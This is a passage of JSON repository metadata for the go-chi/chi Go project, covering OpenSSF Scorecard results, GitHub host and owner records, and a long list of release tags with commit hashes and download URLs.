  1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://cod